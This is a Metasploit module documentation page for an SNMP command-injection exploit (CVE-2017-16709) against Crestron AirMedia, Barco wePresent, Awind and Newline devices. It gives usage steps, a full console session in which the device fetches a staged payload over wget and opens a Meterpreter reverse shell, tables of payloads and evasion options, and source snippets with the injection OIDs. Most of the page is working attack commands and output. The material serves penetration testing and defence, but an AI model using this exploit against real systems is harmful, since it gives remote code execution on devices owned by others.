AwindInc SNMP Service Command Injection - Metasploit


This page contains detailed information about how to use the exploit/linux/snmp/awind_snmp_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: AwindInc SNMP Service Command Injection
Module: exploit/linux/snmp/awind_snmp_exec
Source code: modules/exploits/linux/snmp/awind_snmp_exec.rb
Disclosure date: 2019-03-27
Last modification time: 2019-09-04 12:04:46 +0000
Supported architecture(s): cmd, armle
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): 161
List of CVEs: CVE-2017-16709

This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection. A valid SNMP read-write community is required to exploit this vulnerability. The following devices are known to be affected by this issue: * Crestron Airmedia AM-100 <= version 1.5.0.4 * Crestron Airmedia AM-101 <= version 2.5.0.12 * Awind WiPG-1600w <= version 2.0.1.8 * Awind WiPG-2000d <= version 2.1.6.2 * Barco wePresent 2000 <= version 2.1.5.7 * Newline Trucast 2 <= version 2.1.0.5 * Newline Trucast 3 <= version 2.1.3.7

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/linux/snmp/awind_snmp_exec
msf exploit(awind_snmp_exec) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.

Note: a valid SNMP read-write community is required to exploit this vulnerability.

The following devices are known to be affected by this issue:

  • Crestron Airmedia AM-100 <= version 1.5.0.4
  • Crestron Airmedia AM-101 <= version 2.5.0.12
  • Awind WiPG-1600w <= version 2.0.1.8
  • Awind WiPG-2000d <= version 2.1.6.2
  • Barco wePresent 2000 <= version 2.1.5.7
  • Newline Trucast 2 <= version 2.1.0.5
  • Newline Trucast 3 <= version 2.1.3.7

Other devices might be affected by the same issue but lack of access to firmware forbids me from confirming that. See https://github.com/QKaiser/awind-research for full list of similar devices.

Verification Steps


  1. Start msfconsole
  2. Do: use exploit/linux/snmp/awind_snmp_exec
  3. Do: set payload linux/armle/meterpreter/reverse_tcp
  4. Do: set RHOST [IP]
  5. Do: set LHOST [IP]
  6. Do: run

You should get a session.

Scenarios


msf5 > use exploit/linux/snmp/awind_snmp_exec
msf5 exploit(linux/snmp/awind_snmp_exec) > set payload linux/armle/meterpreter/reverse_tcp 
payload => linux/armle/meterpreter/reverse_tcp
msf5 exploit(linux/snmp/awind_snmp_exec) > set RHOSTS 192.168.100.2
RHOSTS => 192.168.100.2
msf5 exploit(linux/snmp/awind_snmp_exec) > set LHOST 192.168.100.1
LHOST => 192.168.100.1
msf5 exploit(linux/snmp/awind_snmp_exec) > check

[*] Target system is Crestron Electronics AM-100 (Version 2.6.0.6)
[+] 192.168.100.2:161 The target is vulnerable.
msf5 exploit(linux/snmp/awind_snmp_exec) > run

[*] Started reverse TCP handler on 192.168.100.1:4444 
[*] Using URL: http://0.0.0.0:8080/u70HALC
[*] Local IP: http://192.168.1.10:8080/u70HALC
[*] Injecting payload
[*] Injection successful
[*] Triggering call
[*] Trigger successful
[*] Client 192.168.100.2 (Wget) requested /u70HALC
[*] Sending payload to 192.168.100.2 (Wget)
[*] Sending stage (806872 bytes) to 192.168.100.2
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.2:38009) at 2019-03-28 11:01:41 +0100
[*] Server stopped.

meterpreter > sysinfo
Computer     : Crestron.AirMedia-1.1.wm8750
OS           :  (Linux 2.6.32.9-default)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux

Go back to menu.

Msfconsole Usage


Here is how the linux/snmp/awind_snmp_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/snmp/awind_snmp_exec

[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/snmp/awind_snmp_exec) > show info

       Name: AwindInc SNMP Service Command Injection
     Module: exploit/linux/snmp/awind_snmp_exec
   Platform: Unix, Linux
       Arch: cmd, armle
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-03-27

Provided by:
  Quentin Kaiser <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Unix In-Memory
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COMMUNITY  private          yes       SNMP Community String
  RETRIES    1                yes       SNMP Retries
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      161              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL for incoming connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TIMEOUT    1                yes       SNMP Timeout
  URIPATH                     no        The URI to use for this exploit (default is random)
  VERSION    1                yes       SNMP Version <1/2c>

Payload information:

Description:
  This module exploits a vulnerability found in AwindInc and OEM'ed 
  products where untrusted inputs are fed to ftpfw.sh system command, 
  leading to command injection. A valid SNMP read-write community is 
  required to exploit this vulnerability. The following devices are 
  known to be affected by this issue: * Crestron Airmedia AM-100 <= 
  version 1.5.0.4 * Crestron Airmedia AM-101 <= version 2.5.0.12 * 
  Awind WiPG-1600w <= version 2.0.1.8 * Awind WiPG-2000d <= version 
  2.1.6.2 * Barco wePresent 2000 <= version 2.1.5.7 * Newline Trucast 
  2 <= version 2.1.0.5 * Newline Trucast 3 <= version 2.1.3.7

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-16709
  https://github.com/QKaiser/awind-research
  https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/

Module Options


This is a complete list of options available in the linux/snmp/awind_snmp_exec exploit:

msf6 exploit(linux/snmp/awind_snmp_exec) > show options

Module options (exploit/linux/snmp/awind_snmp_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  private          yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      161              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TIMEOUT    1                yes       SNMP Timeout
   URIPATH                     no        The URI to use for this exploit (default is random)
   VERSION    1                yes       SNMP Version <1/2c>

Payload options (linux/armle/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

Advanced Options


Here is a complete list of advanced options supported by the linux/snmp/awind_snmp_exec exploit:

msf6 exploit(linux/snmp/awind_snmp_exec) > show advanced

Module advanced options (exploit/linux/snmp/awind_snmp_exec):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CMDSTAGER::DECODER                       no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto             no        The CMD Stager to use. (Accepted: auto, wget)
   CMDSTAGER::SSL          false            no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                          no        Writable directory for staged files
   CPORT                                    no        The local client port
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (linux/armle/meterpreter_reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/snmp/awind_snmp_exec module can exploit:

msf6 exploit(linux/snmp/awind_snmp_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix In-Memory
   1   Linux Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/snmp/awind_snmp_exec exploit:

msf6 exploit(linux/snmp/awind_snmp_exec) > show payloads

Compatible Payloads
===================

   #   Name                                           Disclosure Date  Rank    Check  Description
   -   ----                                           ---------------  ----    -----  -----------
   0   payload/generic/custom                                          normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                  normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                               normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/linux/armle/adduser                                     normal  No     Linux Add User
   4   payload/linux/armle/exec                                        normal  No     Linux Execute Command
   5   payload/linux/armle/meterpreter/bind_tcp                        normal  No     Linux Meterpreter, Bind TCP Stager
   6   payload/linux/armle/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Stager
   7   payload/linux/armle/meterpreter_reverse_http                    normal  No     Linux Meterpreter, Reverse HTTP Inline
   8   payload/linux/armle/meterpreter_reverse_https                   normal  No     Linux Meterpreter, Reverse HTTPS Inline
   9   payload/linux/armle/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
   10  payload/linux/armle/shell/bind_tcp                              normal  No     Linux dup2 Command Shell, Bind TCP Stager
   11  payload/linux/armle/shell/reverse_tcp                           normal  No     Linux dup2 Command Shell, Reverse TCP Stager
   12  payload/linux/armle/shell_bind_tcp                              normal  No     Linux Command Shell, Reverse TCP Inline
   13  payload/linux/armle/shell_reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/snmp/awind_snmp_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/snmp/awind_snmp_exec) > show evasion

Module evasion options:

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   HTTP::chunked         false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression     none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding  false            no        Enable folding of HTTP headers
   HTTP::junk_headers    false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache        false            no        Disallow the browser to cache HTTP content
   HTTP::server_name     Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size    0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay       0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<IP> SNMP request timeout.


Here is a relevant code snippet related to the "<IP> SNMP request timeout." error message:

81:	          # TODO: insert description check for other vulnerable models (that I don't have)
82:	          # In the meantime, we return 'safe'.
83:	          return CheckCode::Safe
84:	      end
85:	    rescue SNMP::RequestTimeout
86:	      print_error("#{ip} SNMP request timeout.")
87:	    rescue Rex::ConnectionError
88:	      print_error("#{ip} Connection refused.")
89:	    rescue SNMP::UnsupportedVersion
90:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
91:	    rescue ::Interrupt

<IP> Connection refused.


Here is a relevant code snippet related to the "<IP> Connection refused." error message:

83:	          return CheckCode::Safe
84:	      end
85:	    rescue SNMP::RequestTimeout
86:	      print_error("#{ip} SNMP request timeout.")
87:	    rescue Rex::ConnectionError
88:	      print_error("#{ip} Connection refused.")
89:	    rescue SNMP::UnsupportedVersion
90:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
91:	    rescue ::Interrupt
92:	      raise $!
93:	    rescue ::Exception => e

<IP> Unsupported SNMP version specified. Select from '1' or '2c'.


Here is a relevant code snippet related to the "<IP> Unsupported SNMP version specified. Select from '1' or '2c'." error message:

85:	    rescue SNMP::RequestTimeout
86:	      print_error("#{ip} SNMP request timeout.")
87:	    rescue Rex::ConnectionError
88:	      print_error("#{ip} Connection refused.")
89:	    rescue SNMP::UnsupportedVersion
90:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
91:	    rescue ::Interrupt
92:	      raise $!
93:	    rescue ::Exception => e
94:	      print_error("Unknown error: #{e.class} #{e}")
95:	    ensure

Unknown error: <E.CLASS> <E>


Here is a relevant code snippet related to the "Unknown error: <E.CLASS> <E>" error message:

89:	    rescue SNMP::UnsupportedVersion
90:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
91:	    rescue ::Interrupt
92:	      raise $!
93:	    rescue ::Exception => e
94:	      print_error("Unknown error: #{e.class} #{e}")
95:	    ensure
96:	      disconnect_snmp
97:	    end
98:	    Exploit::CheckCode::Unknown
99:	  end

OID not writable or does not provide WRITE access with community '<COMMUNITY>'


Here is a relevant code snippet related to the "OID not writable or does not provide WRITE access with community '<COMMUNITY>'" error message:

104:	      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0],SNMP::OctetString.new(cmd))
105:	      resp = snmp.set(varbind)
106:	      if resp.error_status == :noError
107:	        print_status("Injection successful")
108:	      else
109:	        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
110:	      end
111:	    rescue SNMP::RequestTimeout
112:	      print_error("#{ip} SNMP request timeout.")
113:	    rescue Rex::ConnectionError
114:	      print_error("#{ip} Connection refused.")

<IP> SNMP request timeout.


Here is a relevant code snippet related to the "<IP> SNMP request timeout." error message:

107:	        print_status("Injection successful")
108:	      else
109:	        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
110:	      end
111:	    rescue SNMP::RequestTimeout
112:	      print_error("#{ip} SNMP request timeout.")
113:	    rescue Rex::ConnectionError
114:	      print_error("#{ip} Connection refused.")
115:	    rescue SNMP::UnsupportedVersion
116:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
117:	    rescue ::Interrupt

<IP> Connection refused.


Here is a relevant code snippet related to the "<IP> Connection refused." error message:

109:	        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
110:	      end
111:	    rescue SNMP::RequestTimeout
112:	      print_error("#{ip} SNMP request timeout.")
113:	    rescue Rex::ConnectionError
114:	      print_error("#{ip} Connection refused.")
115:	    rescue SNMP::UnsupportedVersion
116:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
117:	    rescue ::Interrupt
118:	      raise $!
119:	    rescue ::Exception => e

<IP> Unsupported SNMP version specified. Select from '1' or '2c'.


Here is a relevant code snippet related to the "<IP> Unsupported SNMP version specified. Select from '1' or '2c'." error message:

111:	    rescue SNMP::RequestTimeout
112:	      print_error("#{ip} SNMP request timeout.")
113:	    rescue Rex::ConnectionError
114:	      print_error("#{ip} Connection refused.")
115:	    rescue SNMP::UnsupportedVersion
116:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
117:	    rescue ::Interrupt
118:	      raise $!
119:	    rescue ::Exception => e
120:	      print_error("Unknown error: #{e.class} #{e}")
121:	    ensure

Unknown error: <E.CLASS> <E>


Here is a relevant code snippet related to the "Unknown error: <E.CLASS> <E>" error message:

115:	    rescue SNMP::UnsupportedVersion
116:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
117:	    rescue ::Interrupt
118:	      raise $!
119:	    rescue ::Exception => e
120:	      print_error("Unknown error: #{e.class} #{e}")
121:	    ensure
122:	      disconnect_snmp
123:	    end
124:	  end
125:	

OID not writable or does not provide WRITE access with community '<COMMUNITY>'


Here is a relevant code snippet related to the "OID not writable or does not provide WRITE access with community '<COMMUNITY>'" error message:

129:	      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0],SNMP::Integer32.new(1))
130:	      resp = snmp.set(varbind)
131:	      if resp.error_status == :noError
132:	        print_status("Trigger successful")
133:	      else
134:	        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
135:	      end
136:	    rescue SNMP::RequestTimeout
137:	      print_error("#{ip} SNMP request timeout.")
138:	    rescue Rex::ConnectionError
139:	      print_error("#{ip} Connection refused.")

<IP> SNMP request timeout.


Here is a relevant code snippet related to the "<IP> SNMP request timeout." error message:

132:	        print_status("Trigger successful")
133:	      else
134:	        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
135:	      end
136:	    rescue SNMP::RequestTimeout
137:	      print_error("#{ip} SNMP request timeout.")
138:	    rescue Rex::ConnectionError
139:	      print_error("#{ip} Connection refused.")
140:	    rescue SNMP::UnsupportedVersion
141:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
142:	    rescue ::Interrupt

<IP> Connection refused.


Here is a relevant code snippet related to the "<IP> Connection refused." error message:

134:	        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
135:	      end
136:	    rescue SNMP::RequestTimeout
137:	      print_error("#{ip} SNMP request timeout.")
138:	    rescue Rex::ConnectionError
139:	      print_error("#{ip} Connection refused.")
140:	    rescue SNMP::UnsupportedVersion
141:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
142:	    rescue ::Interrupt
143:	      raise $!
144:	    rescue ::Exception => e

<IP> Unsupported SNMP version specified. Select from '1' or '2c'.


Here is a relevant code snippet related to the "<IP> Unsupported SNMP version specified. Select from '1' or '2c'." error message:

136:	    rescue SNMP::RequestTimeout
137:	      print_error("#{ip} SNMP request timeout.")
138:	    rescue Rex::ConnectionError
139:	      print_error("#{ip} Connection refused.")
140:	    rescue SNMP::UnsupportedVersion
141:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
142:	    rescue ::Interrupt
143:	      raise $!
144:	    rescue ::Exception => e
145:	      print_error("Unknown error: #{e.class} #{e}")
146:	    ensure

Unknown error: <E.CLASS> <E>


Here is a relevant code snippet related to the "Unknown error: <E.CLASS> <E>" error message:

140:	    rescue SNMP::UnsupportedVersion
141:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
142:	    rescue ::Interrupt
143:	      raise $!
144:	    rescue ::Exception => e
145:	      print_error("Unknown error: #{e.class} #{e}")
146:	    ensure
147:	      disconnect_snmp
148:	    end
149:	  end
150:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Quentin Kaiser <kaiserquentin[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.